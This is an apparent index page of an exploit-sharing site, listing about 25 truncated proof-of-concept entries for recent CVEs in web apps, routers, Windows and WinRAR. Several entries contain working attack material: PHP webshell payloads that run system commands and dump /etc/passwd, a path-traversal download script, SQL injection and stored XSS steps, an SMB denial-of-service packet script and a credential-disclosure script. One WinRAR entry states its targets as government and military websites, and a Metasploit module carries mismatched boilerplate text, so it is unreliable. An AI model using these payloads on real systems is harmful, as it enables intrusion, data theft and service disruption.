
?day POC Vulnerability Database

POC vulnerability database containing all CVEs, POCs and ?days from across the web in recent years; it can be connected to the ishack vulnerability scanner via API. Some vulnerabilities are visible to members only.

  1. # Exploit Title: Daily Habit Tracker 1.0 - SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24495 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive…

    • 0 replies
    • 18 views
  2. # Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24497 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injectio…

    • 0 replies
    • 25 views
  3. # Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24494 ### Stored Cross-Site Scripting (XSS): > Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the…

    • 0 replies
    • 17 views
  4. # Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24499 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can rea…

    • 0 replies
    • 14 views
  5. # Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) # Date: 2024-1-19 # Exploit Author: tmrswrr # Category: Webapps # Vendor Homepage: https://www.lepton-cms.com/ # Version : 7.0.0 1 ) Login with admin cred > https://127.0.0.1/LEPTON/backend/login/index.php 2 ) Go to Languages place > https://127.0.0.1/LEPTON/backend/languages/index.php 3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?> 4 ) After clicking install you will see the result # Result : uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)

    • 0 replies
    • 22 views
  6. Exploit Title: FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side Template Injection (SSTI) due to the unsafe handling of template variables. An attacker with administrative access can inject malicious code into the email template, leading to arbitrary code execution on the server. Steps to Reproduce: - Log in as an administrator on the Flarum forum. - Navigate to the FoF Pretty Mail ext…

    • 0 replies
    • 16 views
  7. Exploit Title: FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Local File Inclusion (LFI) due to the unsafe handling of file paths in the email template. An attacker with administrative access can exploit this vulnerability to include sensitive files from the server's file system in the email content, potentially leading to information disclosure. Steps to Reproduce: Log in as an administrator on the Flarum…

    • 0 replies
    • 17 views
  8. ############################################# # Exploit Title : Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation # Exploit Author: E1 Coders # CVE: CVE-2024-21338 ############################################# require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact def initialize(info = {}) super( update_info( info, 'Name' => 'CVE-2024-21338 Exploit', 'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.', '…

    • 0 replies
    • 16 views
  9. # Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://code-projects.org # Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/ # Version: v1.0 # Tested on: Windows 10 # CVE : CVE-2024-29412 # Description: Stored Cross Site Scripting vulnerability in Hospital Management System - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the 'patient_id', 'first_name', 'middle_initial', 'last_name' parameters in the /receptionist.php component. # POC: 1. Go to the User Login page:…

    • 0 replies
    • 18 views
  10. # Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html # Version: v1.0 # Tested on: Windows 10 # Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the Firstname and lastname parameter in the profile component. # POC: 1. After login go to http://127.0.0.1/E-Insurance/Script/admin/?page=profile 2. In fname & lname parameter add payload "…

    • 0 replies
    • 17 views
  11. # Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) # Date: 02/04/2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: v1.0 # Tested on: Windows 10 # CVE: CVE-2024-29410 # Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component. # POC: 1. Here we go to : http://127.0.0.1/fuelflow/index.php 2. Now login with default username=mayuri.infosp…

    • 0 replies
    • 16 views
  12. # Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download # CVE: CVE-2024-27356 # Google Dork: intitle:"GL.iNet Admin Panel" # Date: 2/26/2024 # Exploit Author: Bandar Alharbi (aggressor) # Vendor Homepage: www.gl-inet.com # Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin # Tested Model: GL-X3000 Spitz AX # Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md import sys import requests import json requests.packages.urllib3.disable_warnings() h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (co…

    • 0 replies
    • 18 views
  13. # Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi # Date: 2024-04-2 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://github.com/opencart/opencart/releases # Version: 4.0.2.3 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz * Description : Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=product/search&search=test - New…

    • 0 replies
    • 15 views
  14. # Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path Privilege Escalation # Date: 2024-04-02 # Exploit Author: Alaa Kachouh # Vendor Homepage: https://www.asus.com/campaign/ASUS-Control-Center-Express/global/ # Version: Up to 01.06.15 # Tested on: Windows # CVE: CVE-2024-27673 =================================================================== ASUS Control Center Express Version =< 01.06.15 contains an unquoted service path which allows attackers to escalate privileges to the system level. Assuming attackers have write access to C:\, the attackers can abuse the Asus service "Apro console service"/apro_console.exe which upon restarting will inv…

    • 0 replies
    • 16 views
  15. # Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path # Date: 2024-04-2 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.rapid7.com/ # Software Link: https://www.rapid7.com/products/nexpose/ # Version: 6.6.240 # Tested: Windows 10 x64 # Step to discover Unquoted Service Path: C:\Users\saudh>wmic service where 'name like "%nexposeconsole%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Nexpose Security Console nexposeconsole "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe" Auto LocalSystem # …

    • 0 replies
    • 15 views
  16. # Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated) # Google Dork: n/a # Date: 04/02/2024 # Exploit Author: Gian Paris C. Agsam # Vendor Homepage: https://github.com/projectworldsofficial # Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip # Version: 1.0 # Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12 # CVE : n/a import requests import argparse from colorama import (Fore as F, Back as B, Style as S) BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE requests.packages.urllib3.disable_warnings(requests.packages.urlli…

    • 0 replies
    • 22 views
  17. ## Exploit Title: liveSite Version : 2019.1 Campaigns Remote Code Execution ### Date: 2024-1-9 ### Exploit Author: tmrswrr ### Category: Webapps ### Vendor Homepage: https://livesite.com/ ### Version : 2019.1 ### Tested on: https://www.softaculous.com/apps/cms/liveSite 1 ) Login with admin cred Click Campaigns > Create Campaign > Choose format Plain Text , write in body your payload : https://127.0.0.1/liveSite/livesite/add_email_campaign.php Payload : <?php echo system('cat /etc/passwd'); ?> 2 ) After saving you will see the result: Result: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin …

    • 0 replies
    • 16 views
  18. # Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal # Date: 2024-03-06 # Exploit Author: Ven3xy # Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip # Version: 2.7.10 # Tested on: Linux import sys import requests from urllib.parse import urljoin import time def exploit(target_url, file_name, depth): traversal = '../' * depth exploit_url = urljoin(target_url, '/wp-admin/tools.php') params = { 'page': 'backup_manager', 'download_backup_file': f'{traversal}{file_name}' } response = requests.get(exploit_url, params=params) if response.status_code == 200 and resp…

    • 0 replies
    • 17 views
  19. ################################################################################################ # Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Security Risk : High # # # # Description : All target's GOV & Military websites # # # ################################################################################################ # # # Expl0iTs: # #include <stdio.h> #include <stdlib.h> #include <string.h> #include "zip.h" #define PDF_FILE "document.pdf" #define FOLDER_NAME "document.pdf\\" #define SCRIPT_FILE "script.bat" #define ZIP_FILE "expl…

    • 0 replies
    • 13 views
  20. # Exploit Title: [title] Dell Security Management Server versions prior to 11.9.0 # Exploit Author: [author] Amirhossein Bahramizadeh # CVE : [if applicable] CVE-2023-32479 Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server versions prior to 11.9.0 contain privilege escalation vulnerability due to improper ACL of the non-default installation directory. A local malicious user could potentially exploit this vulnerability by replacing binaries in installed directory and taking the reverse shell of the system leading to Privilege Escalation. #!/bin/bash INSTALL_DIR="/opt/dell" # Check if the installed directory has improper ACLs i…

    • 0 replies
    • 10 views
  21. # Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS # Google Dork: N/A # Date: 03/04/2024 # Exploit Author: ice-wzl, Solstice Cyber Solutions # Vendor Homepage: https://mikrotik.com/ # Software Link: https://mikrotik.com/download/archive # Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10 # Tested on: RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 # CVE : CVE-2024-27686 #!/usr/bin/python3 # Founded by ice-wzl in conjunction with Solstice Cyber Solutions import argparse import sys import socket # Define the packets # the packet that causes crash 6.40.5 - 6.42.3 fuzzed_packet_6 = b'\x00\x00\x00n\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x03\x00\xf1\x1f\x08\x…

    • 0 replies
    • 11 views
  22. # Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure # Date: 28-02-2024 # Exploit Author: semaja2 # Vendor Homepage: https://siklu.com/ # Software Link: https://partners.siklu.com/home/frontdoor # Version: < 2.0.0 # Tested on: 2.0.0 # CVE : None assigned # # Instructions # 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device # `ping6 -I en7 -c 2 ff02::1` # 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address # `ip -6 neigh show dev en7` # 3. Execute script # `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7` # 4. Enjoy the access import socket imp…

    • 0 replies
    • 11 views
  23. Exploit Title: Broken Access Control - on NodeBB v3.6.7 Date: 22/2/2024 Exploit Author: Vibhor Sharma Vendor Homepage: https://nodebb.org/ Version: 3.6.7 Description: I identified a broken access control vulnerability in nodeBB v3.6.7, enabling attackers to access restricted information intended solely for administrators. Specifically, this data is accessible only to admins and not regular users. Through testing, I discovered that when a user accesses the group section of the application and intercepts the response for the corresponding request, certain attributes are provided in the JSON response. By manipulating these attributes, a user can gain access to tabs res…

    • 0 replies
    • 11 views
  24. Posted by ISHACK AI BOT

    # Exploit Title: Purei CMS 1.0 - SQL Injection # Date: [27-03-2024] # Exploit Author: [Number 7] # Vendor Homepage: [purei.com] # Version: [1.0] # Tested on: [Linux] ____________________________________________________________________________________ Introduction: An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation of user input. Such an injection transpires when web applications accept user input directly inserted into an SQL statement without effectively filtering out hazardous characters. This could jeopardize the integrity of your database or reveal sensitive information. __________________________________________…

    • 0 replies
    • 13 views
  25. # Exploit Title: Workout Journal App 1.0 - Stored XSS # Date: 12.01.2024 # Exploit Author: MURAT CAGRI ALIS # Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html> # Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Windows / MacOS / Linux # CVE : CVE-2024-24050 # Description Install and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and L…

    • 0 replies
    • 17 views